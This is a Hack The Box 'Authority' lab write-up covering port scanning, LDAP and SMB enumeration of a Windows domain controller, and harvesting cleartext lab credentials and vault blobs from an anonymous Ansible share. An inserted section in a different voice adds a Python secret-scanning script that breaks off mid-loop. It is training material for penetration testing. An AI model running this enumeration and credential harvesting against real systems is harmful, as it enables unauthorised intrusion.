
【Hack The Box】Authority【Writeup】

Posted at 2023-12-09

This is the day-3 article of the ZOZO Advent Calendar 2023, Vol.4. Yesterday's post was "いまさら!いまこそ!ニコニコカレンダー!" ("Now of all times! Now is the time! The Niko-niko calendar!") by @YasuhiroKimesawa.

Introduction

This article is a writeup of my attempt at "Authority" on Hack The Box (see the link below).

※Please do not misuse any of this. Use these techniques only to contribute to society; anything else is against the law.

Initial reconnaissance

On an HTB machine you are given a single target IP.
We port-scan that IP over the VPN connection to find out which ports are open.

Port scan

I use RustScan.

┌──(root㉿kali)-[~]
└─# rustscan -a 10.129.11.155 --top --ulimit 5000 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.11.155:53
Open 10.129.11.155:80
Open 10.129.11.155:88
Open 10.129.11.155:135
Open 10.129.11.155:139
Open 10.129.11.155:389
Open 10.129.11.155:445
Open 10.129.11.155:464
Open 10.129.11.155:593
Open 10.129.11.155:636
Open 10.129.11.155:5985
Open 10.129.11.155:3269
Open 10.129.11.155:3268
Open 10.129.11.155:8443
Open 10.129.11.155:9389
Open 10.129.11.155:49664
Open 10.129.11.155:49666
Open 10.129.11.155:49667
Open 10.129.11.155:49665
Open 10.129.11.155:49671
Open 10.129.11.155:49686
Open 10.129.11.155:49687
Open 10.129.11.155:49690
Open 10.129.11.155:49689
Open 10.129.11.155:49699
Open 10.129.11.155:49714
Open 10.129.11.155:49719
Open 10.129.11.155:47001
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 21:14 EDT
Initiating Ping Scan at 21:14
Scanning 10.129.11.155 [4 ports]
Completed Ping Scan at 21:14, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:14
Completed Parallel DNS resolution of 1 host. at 21:14, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:14
Scanning 10.129.11.155 [28 ports]
Discovered open port 135/tcp on 10.129.11.155
Discovered open port 53/tcp on 10.129.11.155
Discovered open port 139/tcp on 10.129.11.155
Discovered open port 49666/tcp on 10.129.11.155
Discovered open port 80/tcp on 10.129.11.155
Discovered open port 3268/tcp on 10.129.11.155
Discovered open port 445/tcp on 10.129.11.155
Discovered open port 88/tcp on 10.129.11.155
Discovered open port 636/tcp on 10.129.11.155
Discovered open port 49671/tcp on 10.129.11.155
Discovered open port 8443/tcp on 10.129.11.155
Discovered open port 47001/tcp on 10.129.11.155
Discovered open port 49719/tcp on 10.129.11.155
Discovered open port 5985/tcp on 10.129.11.155
Discovered open port 49667/tcp on 10.129.11.155
Discovered open port 9389/tcp on 10.129.11.155
Discovered open port 49664/tcp on 10.129.11.155
Discovered open port 464/tcp on 10.129.11.155
Discovered open port 49665/tcp on 10.129.11.155
Discovered open port 49686/tcp on 10.129.11.155
Discovered open port 49690/tcp on 10.129.11.155
Discovered open port 49714/tcp on 10.129.11.155
Discovered open port 49689/tcp on 10.129.11.155
Discovered open port 593/tcp on 10.129.11.155
Discovered open port 49699/tcp on 10.129.11.155
Discovered open port 49687/tcp on 10.129.11.155
Discovered open port 389/tcp on 10.129.11.155
Discovered open port 3269/tcp on 10.129.11.155
Completed SYN Stealth Scan at 21:14, 0.54s elapsed (28 total ports)
Nmap scan report for 10.129.11.155
Host is up, received echo-reply ttl 127 (0.26s latency).
Scanned at 2023-07-15 21:14:52 EDT for 1s

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
8443/tcp  open  https-alt        syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
47001/tcp open  winrm            syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49665/tcp open  unknown          syn-ack ttl 127
49666/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49671/tcp open  unknown          syn-ack ttl 127
49686/tcp open  unknown          syn-ack ttl 127
49687/tcp open  unknown          syn-ack ttl 127
49689/tcp open  unknown          syn-ack ttl 127
49690/tcp open  unknown          syn-ack ttl 127
49699/tcp open  unknown          syn-ack ttl 127
49714/tcp open  unknown          syn-ack ttl 127
49719/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
           Raw packets sent: 32 (1.384KB) | Rcvd: 29 (1.260KB)

This looks like a Windows environment. Plenty of ports are open, so let's collect more information.
First, fetch the root DSE (the DSA-specific entry) over LDAP.

┌──(root㉿kali)-[~]
└─# nmap -p 389 -n -Pn --open 10.129.11.155 --script ldap-rootdse
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 21:20 EDT
Nmap scan report for 10.129.11.155
Host is up (0.25s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=authority,DC=htb
|       ldapServiceName: authority.htb:authority$@AUTHORITY.HTB
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       supportedLDAPPolicies: MaxPoolThreads
|       supportedLDAPPolicies: MaxPercentDirSyncRequests
|       supportedLDAPPolicies: MaxDatagramRecv
|       supportedLDAPPolicies: MaxReceiveBuffer
|       supportedLDAPPolicies: InitRecvTimeout
|       supportedLDAPPolicies: MaxConnections
|       supportedLDAPPolicies: MaxConnIdleTime
|       supportedLDAPPolicies: MaxPageSize
|       supportedLDAPPolicies: MaxBatchReturnMessages
|       supportedLDAPPolicies: MaxQueryDuration
|       supportedLDAPPolicies: MaxDirSyncDuration
|       supportedLDAPPolicies: MaxTempTableSize
|       supportedLDAPPolicies: MaxResultSetSize
|       supportedLDAPPolicies: MinResultSets
|       supportedLDAPPolicies: MaxResultSetsPerConn
|       supportedLDAPPolicies: MaxNotificationPerConn
|       supportedLDAPPolicies: MaxValRange
|       supportedLDAPPolicies: MaxValRangeTransitive
|       supportedLDAPPolicies: ThreadMemoryLimit
|       supportedLDAPPolicies: SystemMemoryLimitPercent
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.840.113556.1.4.801
|       supportedControl: 1.2.840.113556.1.4.473
|       supportedControl: 1.2.840.113556.1.4.528
|       supportedControl: 1.2.840.113556.1.4.417
|       supportedControl: 1.2.840.113556.1.4.619
|       supportedControl: 1.2.840.113556.1.4.841
|       supportedControl: 1.2.840.113556.1.4.529
|       supportedControl: 1.2.840.113556.1.4.805
|       supportedControl: 1.2.840.113556.1.4.521
|       supportedControl: 1.2.840.113556.1.4.970
|       supportedControl: 1.2.840.113556.1.4.1338
|       supportedControl: 1.2.840.113556.1.4.474
|       supportedControl: 1.2.840.113556.1.4.1339
|       supportedControl: 1.2.840.113556.1.4.1340
|       supportedControl: 1.2.840.113556.1.4.1413
|       supportedControl: 2.16.840.1.113730.3.4.9
|       supportedControl: 2.16.840.1.113730.3.4.10
|       supportedControl: 1.2.840.113556.1.4.1504
|       supportedControl: 1.2.840.113556.1.4.1852
|       supportedControl: 1.2.840.113556.1.4.802
|       supportedControl: 1.2.840.113556.1.4.1907
|       supportedControl: 1.2.840.113556.1.4.1948
|       supportedControl: 1.2.840.113556.1.4.1974
|       supportedControl: 1.2.840.113556.1.4.1341
|       supportedControl: 1.2.840.113556.1.4.2026
|       supportedControl: 1.2.840.113556.1.4.2064
|       supportedControl: 1.2.840.113556.1.4.2065
|       supportedControl: 1.2.840.113556.1.4.2066
|       supportedControl: 1.2.840.113556.1.4.2090
|       supportedControl: 1.2.840.113556.1.4.2205
|       supportedControl: 1.2.840.113556.1.4.2204
|       supportedControl: 1.2.840.113556.1.4.2206
|       supportedControl: 1.2.840.113556.1.4.2211
|       supportedControl: 1.2.840.113556.1.4.2239
|       supportedControl: 1.2.840.113556.1.4.2255
|       supportedControl: 1.2.840.113556.1.4.2256
|       supportedControl: 1.2.840.113556.1.4.2309
|       supportedControl: 1.2.840.113556.1.4.2330
|       supportedControl: 1.2.840.113556.1.4.2354
|       supportedCapabilities: 1.2.840.113556.1.4.800
|       supportedCapabilities: 1.2.840.113556.1.4.1670
|       supportedCapabilities: 1.2.840.113556.1.4.1791
|       supportedCapabilities: 1.2.840.113556.1.4.1935
|       supportedCapabilities: 1.2.840.113556.1.4.2080
|       supportedCapabilities: 1.2.840.113556.1.4.2237
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=authority,DC=htb
|       serverName: CN=AUTHORITY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=authority,DC=htb
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=authority,DC=htb
|       namingContexts: DC=authority,DC=htb
|       namingContexts: CN=Configuration,DC=authority,DC=htb
|       namingContexts: CN=Schema,CN=Configuration,DC=authority,DC=htb
|       namingContexts: DC=DomainDnsZones,DC=authority,DC=htb
|       namingContexts: DC=ForestDnsZones,DC=authority,DC=htb
|       isSynchronized: TRUE
|       highestCommittedUSN: 266468
|       dsServiceName: CN=NTDS Settings,CN=AUTHORITY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=authority,DC=htb
|       dnsHostName: authority.authority.htb
|       defaultNamingContext: DC=authority,DC=htb
|       currentTime: 20230716052122.0Z
|_      configurationNamingContext: CN=Configuration,DC=authority,DC=htb
Service Info: Host: AUTHORITY; OS: Windows

Nmap done: 1 IP address (1 host up) scanned in 1.41 seconds

dnsHostName: authority.authority.htb tells us the domain name.
Port 80 is open, so let's have a look at it.
[screenshot: 1.png]
It is just the default IIS page, so we gather information via another route.

rpcclient

RPC is open, so let's see whether we can enumerate anything through it.

┌──(root㉿kali)-[~]
└─# rpcclient 10.129.11.155 -U '' -N  
rpcclient $> enumdomains
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaquery
do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> 

No luck.

SMB

Ports 139 and 445 are open, so let's try talking SMB.
There may be files lying around that give us a hint.
We look for areas that can be read without a password.

┌──(root㉿kali)-[~]
└─# smbclient -N -L \\\\10.129.11.155 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Department Shares Disk      
        Development     Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.11.155 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Development and Department Shares look interesting, so we start there.
Department Shares was not accessible, so we go into the Development tree instead.

┌──(root㉿kali)-[~/work]
└─# smbclient -N \\\\10.129.11.155\\Development
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Mar 17 09:20:38 2023
  ..                                  D        0  Fri Mar 17 09:20:38 2023
  Automation                          D        0  Fri Mar 17 09:20:40 2023
cd 
                5888511 blocks of size 4096. 1335841 blocks available
smb: \> cd Automation
smb: \Automation\> dir
  .                                   D        0  Fri Mar 17 09:20:40 2023
  ..                                  D        0  Fri Mar 17 09:20:40 2023
  Ansible                             D        0  Fri Mar 17 09:20:50 2023

                5888511 blocks of size 4096. 1335841 blocks available

We can see the directory tree of an infrastructure-automation tool (Ansible). Let's pull the whole tree down recursively.

smb: \Automation\> mask ""
smb: \Automation\> recurse ON
smb: \Automation\> prompt OFF
smb: \Automation\> mget *
getting file \Automation\Ansible\ADCS\.ansible-lint of size 259 as Ansible/ADCS/.ansible-lint (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\.yamllint of size 205 as Ansible/ADCS/.yamllint (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\LICENSE of size 11364 as Ansible/ADCS/LICENSE (10.9 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\README.md of size 7279 as Ansible/ADCS/README.md (7.0 KiloBytes/sec) (average 4.6 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\requirements.txt of size 466 as Ansible/ADCS/requirements.txt (0.4 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\requirements.yml of size 264 as Ansible/ADCS/requirements.yml (0.3 KiloBytes/sec) (average 3.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\SECURITY.md of size 924 as Ansible/ADCS/SECURITY.md (0.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tox.ini of size 419 as Ansible/ADCS/tox.ini (0.4 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\.travis.yml of size 1414 as Ansible/LDAP/.travis.yml (1.4 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\README.md of size 5768 as Ansible/LDAP/README.md (5.4 KiloBytes/sec) (average 2.7 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\TODO.md of size 119 as Ansible/LDAP/TODO.md (0.1 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\Vagrantfile of size 640 as Ansible/LDAP/Vagrantfile (0.6 KiloBytes/sec) (average 2.3 KiloBytes/sec)
getting file \Automation\Ansible\PWM\ansible.cfg of size 491 as Ansible/PWM/ansible.cfg (0.5 KiloBytes/sec) (average 2.2 KiloBytes/sec)
getting file \Automation\Ansible\PWM\ansible_inventory of size 174 as Ansible/PWM/ansible_inventory (0.2 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\PWM\README.md of size 1290 as Ansible/PWM/README.md (1.2 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\defaults\main.yml of size 1578 as Ansible/ADCS/defaults/main.yml (1.5 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\meta\main.yml of size 549 as Ansible/ADCS/meta/main.yml (0.5 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\meta\preferences.yml of size 22 as Ansible/ADCS/meta/preferences.yml (0.0 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\assert.yml of size 2936 as Ansible/ADCS/tasks/assert.yml (2.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\generate_ca_certs.yml of size 2262 as Ansible/ADCS/tasks/generate_ca_certs.yml (2.2 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\init_ca.yml of size 1244 as Ansible/ADCS/tasks/init_ca.yml (1.2 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\main.yml of size 1359 as Ansible/ADCS/tasks/main.yml (1.3 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\tasks\requests.yml of size 4214 as Ansible/ADCS/tasks/requests.yml (4.0 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\templates\extensions.cnf.j2 of size 1659 as Ansible/ADCS/templates/extensions.cnf.j2 (1.6 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\templates\openssl.cnf.j2 of size 11294 as Ansible/ADCS/templates/openssl.cnf.j2 (10.6 KiloBytes/sec) (average 2.2 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\vars\main.yml of size 2146 as Ansible/ADCS/vars/main.yml (2.0 KiloBytes/sec) (average 2.2 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\.bin\clean_vault of size 677 as Ansible/LDAP/.bin/clean_vault (0.6 KiloBytes/sec) (average 2.2 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\.bin\diff_vault of size 357 as Ansible/LDAP/.bin/diff_vault (0.3 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\.bin\smudge_vault of size 768 as Ansible/LDAP/.bin/smudge_vault (0.7 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\defaults\main.yml of size 1046 as Ansible/LDAP/defaults/main.yml (1.0 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\files\pam_mkhomedir of size 170 as Ansible/LDAP/files/pam_mkhomedir (0.2 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\handlers\main.yml of size 277 as Ansible/LDAP/handlers/main.yml (0.3 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\meta\main.yml of size 416 as Ansible/LDAP/meta/main.yml (0.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\tasks\main.yml of size 5235 as Ansible/LDAP/tasks/main.yml (4.9 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\templates\ldap_sudo_groups.j2 of size 131 as Ansible/LDAP/templates/ldap_sudo_groups.j2 (0.1 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\templates\ldap_sudo_users.j2 of size 106 as Ansible/LDAP/templates/ldap_sudo_users.j2 (0.1 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\templates\sssd.conf.j2 of size 2556 as Ansible/LDAP/templates/sssd.conf.j2 (2.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\templates\sudo_group.j2 of size 30 as Ansible/LDAP/templates/sudo_group.j2 (0.0 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\vars\debian.yml of size 174 as Ansible/LDAP/vars/debian.yml (0.2 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\vars\main.yml of size 75 as Ansible/LDAP/vars/main.yml (0.1 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\vars\redhat.yml of size 222 as Ansible/LDAP/vars/redhat.yml (0.2 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \Automation\Ansible\LDAP\vars\ubuntu-14.04.yml of size 203 as Ansible/LDAP/vars/ubuntu-14.04.yml (0.2 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \Automation\Ansible\PWM\defaults\main.yml of size 1591 as Ansible/PWM/defaults/main.yml (1.5 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \Automation\Ansible\PWM\handlers\main.yml of size 4 as Ansible/PWM/handlers/main.yml (0.0 KiloBytes/sec) (average 1.6 KiloBytes/sec)
getting file \Automation\Ansible\PWM\meta\main.yml of size 199 as Ansible/PWM/meta/main.yml (0.2 KiloBytes/sec) (average 1.6 KiloBytes/sec)
getting file \Automation\Ansible\PWM\tasks\main.yml of size 1832 as Ansible/PWM/tasks/main.yml (1.8 KiloBytes/sec) (average 1.6 KiloBytes/sec)
getting file \Automation\Ansible\PWM\templates\context.xml.j2 of size 422 as Ansible/PWM/templates/context.xml.j2 (0.4 KiloBytes/sec) (average 1.6 KiloBytes/sec)
getting file \Automation\Ansible\PWM\templates\tomcat-users.xml.j2 of size 388 as Ansible/PWM/templates/tomcat-users.xml.j2 (0.4 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \Automation\Ansible\SHARE\tasks\main.yml of size 1876 as Ansible/SHARE/tasks/main.yml (1.8 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\molecule\default\converge.yml of size 106 as Ansible/ADCS/molecule/default/converge.yml (0.1 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\molecule\default\molecule.yml of size 526 as Ansible/ADCS/molecule/default/molecule.yml (0.5 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \Automation\Ansible\ADCS\molecule\default\prepare.yml of size 371 as Ansible/ADCS/molecule/default/prepare.yml (0.4 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \Automation\>

Looks like there are a lot of files. Going through them is going to be a chore.

Credential access

Investigation

Going through the files collected over SMB for anything useful, I found the following credentials.

┌──(root㉿kali)-[~/work/Ansible/PWM]
└─# cat ansible_inventory 
ansible_user: administrator
ansible_password: Welcome1
ansible_port: 5985
ansible_connection: winrm
ansible_winrm_transport: ntlm
ansible_winrm_server_cert_validation: ignore  
┌──(root㉿kali)-[~/work/Ansible/PWM]
└─# cat defaults/main.yml        
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"

pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true

pwm_require_ssl: false

pwm_admin_login: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          32666534386435366537653136663731633138616264323230383566333966346662313161326239
          6134353663663462373265633832356663356239383039640a346431373431666433343434366139
          35653634376333666234613466396534343030656165396464323564373334616262613439343033
          6334326263326364380a653034313733326639323433626130343834663538326439636232306531
          3438

pwm_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          31356338343963323063373435363261323563393235633365356134616261666433393263373736
          3335616263326464633832376261306131303337653964350a363663623132353136346631396662
          38656432323830393339336231373637303535613636646561653637386634613862316638353530
          3930356637306461350a316466663037303037653761323565343338653934646533663365363035
          6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          63303831303534303266356462373731393561313363313038376166336536666232626461653630
          3437333035366235613437373733316635313530326639330a643034623530623439616136363563
          34646237336164356438383034623462323531316333623135383134656263663266653938333334
          3238343230333633350a646664396565633037333431626163306531336336326665316430613566
          3764    
┌──(root㉿kali)-[~/work/Ansible/LDAP]
└─# cat .travis.yml      
---
language: python
python: "2.7"

# Use the new container infrastructure
sudo: false

# Install ansible
addons:
  apt:
    packages:
    - python-pip

env:
  global:
    - secure: "YP54FaEPVveTtCzlJG3YPuhxUFQvbVkr1L/AA9NM9rwFciwQcLtIXD9iljD17xzoXRwvooNW90eX8XMR2zkhqzU9C+n3kHw2iQVtAdbI1X59lGAXAT7WBMlU6auFsoVzkFibHxJ1W9R1o5JE2iTdDuR0UzQNaTgLn3Dgt7iOWzwNni3dmqdtbPXY7e5x+JhlKHOU53bGnLxFVmbTWzu0Z8ZDuVvh01azHdR0sj8KmC4c8A8atZU0f2f4YyG/26tx78U6RmNFyj2UTmOHRgOtcQVOzfadbI9gZuc1U5JIkS0FEwZYaJOMYhohAqp9Aumo+cuPVJCvjaEXrlvEe4DAJ6aFigT+JR6NY7w+fgoK57HTgC/y7chY30+34ggp+/0aWmXFqdDUbFWs9ovhf0hVL4AcU+31BWdrEmuJjXAGaGMSrdTYJpMFsnjIqe3bUimH1LEm4+wogD/poGSkRsv9R7j1OeQotVDaivRh6WOBdbXEw5HENczsBzD3TztN8A54UzvVnrMnoPI+aH2uvSm/5JVvqWzWEzZHIpep7lbTgRk/1yjxQk6mXDGtrd9uo4e7ZeEr3rBqtA6qI4VggugHIbLGtqQvINdV9fOnDB1sLlslLEIKfT8BLpnDncPYYVV0r0wyC5ySP+RX7nqsixX5oOR7a1UyXBBQ9D0CX3x7x0Y="

install:
  # Install ansible
  - pip install ansible

  # Check ansible version
  - ansible --version

  # Create ansible.cfg with correct roles_path
  - printf '[defaults]\nroles_path=../' >ansible.cfg

before_script:
  - echo "$VAULT_PASSWORD" > .vault_password

script:
  # Basic role syntax check
  - ansible-playbook tests/travis.yml -i localhost, --vault-password-file .vault_password --syntax-check

notifications:
  webhooks:
    urls:
      - https://galaxy.ansible.com/api/v1/notifications/
      - https://t2d.idolactiviti.es/notify
┌──(root㉿kali)-[~/work/Ansible/ADCS/defaults]
└─# cat main.yml 
---
# defaults file for ca

# set ca_init: 'yes' to create CA
ca_init: yes

# ca_own_root: 'yes' if you want to have yout own root CA.
# if no, set ca_certificate_path manually
ca_own_root: yes

# A passphrase for the CA key.
ca_passphrase: SuP3rS3creT

# The common name for the CA.
ca_common_name: authority.htb

# Other details for the CA.
ca_country_name: NL
ca_email_address: admin@authority.htb
ca_organization_name: htb
ca_organizational_unit_name: htb
ca_state_or_province_name: Utrecht
ca_locality_name: Utrecht
┌──(root㉿kali)-[~/work/Ansible/PWM/templates]
└─# cat tomcat-users.xml.j2  
<?xml version='1.0' encoding='cp1252'?>

<tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
 version="1.0">

<user username="admin" password="T0mc@tAdm1n" roles="manager-gui"/>  
<user username="robot" password="T0mc@tR00t" roles="manager-script"/>

</tomcat-users>

I found quite a few, but every WinRM login attempt with them was rejected. This needs a bit more twisting.
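The share above leaked a cleartext WinRM password, a CA passphrase, Tomcat manager credentials and three Ansible Vault blobs. The following is an added example (not code from the writeup or from any of the projects it mentions) of the kind of check a defender would run over a repository or file share before it reaches a place like this: it walks text files, flags secret-looking YAML keys, `password="..."` attributes and `!vault` values, and reports them with the values redacted. The sample files are constructed, shortened copies of what the writeup pulled from the Development share (vault bodies truncated); the regular expressions and the "kind" labels are my own.

```python
import re

# Constructed samples: shortened copies of the files the writeup pulled from the
# Development share (vault bodies truncated to one line; values as on the page).
SAMPLES = {
    "PWM/ansible_inventory": (
        "ansible_user: administrator\n"
        "ansible_password: Welcome1\n"
        "ansible_port: 5985\n"
        "ansible_connection: winrm\n"
    ),
    "PWM/defaults/main.yml": (
        "---\n"
        "pwm_run_dir: \"{{ lookup('env', 'PWD') }}\"\n"
        "pwm_https_port: \"{{ https_port }}\"\n"
        "pwm_admin_login: !vault |\n"
        "          $ANSIBLE_VAULT;1.1;AES256\n"
        "          32666534386435366537653136663731...\n"
        "pwm_admin_password: !vault |\n"
        "          $ANSIBLE_VAULT;1.1;AES256\n"
        "          31356338343963323063373435363261...\n"
        "ldap_admin_password: !vault |\n"
        "          $ANSIBLE_VAULT;1.1;AES256\n"
        "          63303831303534303266356462373731...\n"
    ),
    "ADCS/defaults/main.yml": (
        "# A passphrase for the CA key.\n"
        "ca_passphrase: SuP3rS3creT\n"
        "ca_common_name: authority.htb\n"
    ),
    "PWM/templates/tomcat-users.xml.j2": (
        '<user username="admin" password="T0mc@tAdm1n" roles="manager-gui"/>\n'
        '<user username="robot" password="T0mc@tR00t" roles="manager-script"/>\n'
    ),
}

# YAML "key: value" lines whose key name suggests a secret.
SECRET_KEY_RE = re.compile(
    r"^\s*([\w.-]*(?:password|passphrase|passwd|secret|token)[\w.-]*)\s*:\s*(.*?)\s*$",
    re.IGNORECASE,
)
# Any YAML key whose value is an Ansible Vault blob, whatever the key is called.
VAULT_RE = re.compile(r"^\s*([\w.-]+)\s*:\s*!vault\b")
# XML/HTML style password="..." attributes (e.g. tomcat-users.xml).
ATTR_RE = re.compile(r"\b(password|passwd|secret)\s*=\s*\"([^\"]*)\"", re.IGNORECASE)
# Jinja template references such as "{{ https_port }}" are not literal secrets.
TEMPLATE_RE = re.compile(r"^[\"']?\{\{.*\}\}[\"']?$")


def redact(value):
    """Keep only the first two characters so the report itself does not leak the secret."""
    return value[:2] + "*" * max(len(value) - 2, 0)


def scan_text(path, text):
    """Scan one file's text; return a list of finding dicts (values redacted)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        vault = VAULT_RE.match(line)
        if vault:
            findings.append({"file": path, "line": lineno, "key": vault.group(1),
                             "kind": "ansible_vault", "value": None})
            continue
        key = SECRET_KEY_RE.match(line)
        if key:
            value = key.group(2)
            if value and not TEMPLATE_RE.match(value):
                findings.append({"file": path, "line": lineno, "key": key.group(1),
                                 "kind": "plaintext", "value": redact(value)})
            continue
        for attr in ATTR_RE.finditer(line):
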